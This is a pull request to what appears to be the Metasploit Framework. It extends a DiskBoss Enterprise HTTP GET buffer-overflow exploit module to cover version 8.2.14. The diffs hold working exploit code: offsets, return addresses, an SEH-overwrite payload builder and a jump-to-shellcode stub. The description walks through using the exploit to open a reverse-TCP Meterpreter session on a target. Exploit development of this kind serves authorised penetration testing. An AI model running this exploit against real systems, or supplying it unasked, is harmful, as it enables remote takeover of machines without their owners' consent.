### PR TITLE
Update DiskBoss Module (EDB 42395)

### DIFF
--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
         caused by improper bounds checking of the request path in HTTP GET
         requests sent to the built-in web server. This module has been
         tested successfully on Windows XP SP3 and Windows 7 SP1.
@@ -22,12 +22,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'vportal',      # Vulnerability discovery and PoC
-          'Gabor Seljan'  # Metasploit module
+          'vportal',        # Vulnerability discovery and PoC
+          'Gabor Seljan',   # Metasploit module
+          'Ahmad Mahfouz',  # Vulnerability discovery and PoC
+          'Jacob Robles'    # Metasploit module
         ],
       'References'     =>
         [
-          ['EDB', '40869']
+          ['EDB', '40869'],
+          ['EDB', '42395']
         ],
       'DefaultOptions' =>
         {
@@ -60,6 +63,13 @@ class MetasploitModule < Msf::Exploit::Remote
               'Offset' => 2471,
               'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
             }
+          ],
+          [
+            'DiskBoss Enterprise v8.2.14',
+            {
+              'Offset' => 2496,
+              'Ret'    => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
+            }
           ]
         ],
       'Privileged'     => true,
@@ -74,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code == 200
-      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
+      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
         return Exploit::CheckCode::Vulnerable
       elsif res.body =~ /DiskBoss Enterprise/
         return Exploit::CheckCode::Detected
@@ -105,6 +115,8 @@ class MetasploitModule < Msf::Exploit::Remote
           mytarget = targets[1]
         elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
           mytarget = targets[2]
+        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
+          mytarget = targets[3]
         end
       end
 
@@ -115,11 +127,22 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    sploit =  make_nops(21)
-    sploit << payload.encoded
-    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
-    sploit << [mytarget.ret].pack('V')
-    sploit << rand_text_alpha(2500)
+    if !(mytarget == targets[3])
+      sploit =  make_nops(21)
+      sploit << payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit << [mytarget.ret].pack('V')
+      sploit << rand_text_alpha(2500)
+    else
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
+      sploit << rand_text_alpha(5000 - sploit.length)
+
+    end
 
     send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -23,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'vportal',        # Vulnerability discovery and PoC
-          'Gabor Seljan',   # Metasploit module
           'Ahmad Mahfouz',  # Vulnerability discovery and PoC
+          'Gabor Seljan',   # Metasploit module
           'Jacob Robles'    # Metasploit module
         ],
       'References'     =>
@@ -127,21 +127,23 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    if !(mytarget == targets[3])
+    case mytarget
+    when targets[1], targets[2]
       sploit =  make_nops(21)
       sploit << payload.encoded
       sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
       sploit << [mytarget.ret].pack('V')
       sploit << rand_text_alpha(2500)
-    else
+    when targets[3]
       seh = generate_seh_record(mytarget.ret)
       sploit = payload.encoded
       sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
       sploit[sploit.length, seh.length] = seh
       sploit <<  make_nops(10)
-      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
+      sploit << Rex::Arch::X86.jmp(0xffffbf25)   # JMP to ShellCode
       sploit << rand_text_alpha(5000 - sploit.length)
-
+    else
+      fail_with(Failure::NoTarget, 'No matching target')
     end
 
     send_request_cgi(


### PR DESCRIPTION
Added a new target option for the
DiskBoss Server.


This is an MSF port of https://www.exploit-db.com/exploits/42395/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 8.2.14. The vulnerable application is available for download at https://www.exploit-db.com/apps/7e7d6455ada0833b6bf11167e43977df-diskbossent_setup_v8.2.14.exe.

## Verification
- [x] Start `DiskBoss Enterprise` service
- [x] Start `DiskBoss Enterprise` client application
- [x] Navigate to `Tools` > `DiskBoss Server Options` > `Server`
- [x] Check `Enable Web Server On Port 80` to start the web interface
- [x] Start `msfconsole`
- [x] Do `use exploit/windows/http/diskboss_get_bof`
- [x] Do `set rhost <target IP>`
- [x] Do `check`
- [x] Verify that the target is vulnerable
- [x] Do `set payload windows/meterpreter/reverse_tcp`
- [x] Do `set lhost <framework system IP>`
- [x] Do `run`
- [x] Verify that the Meterpreter session is opened

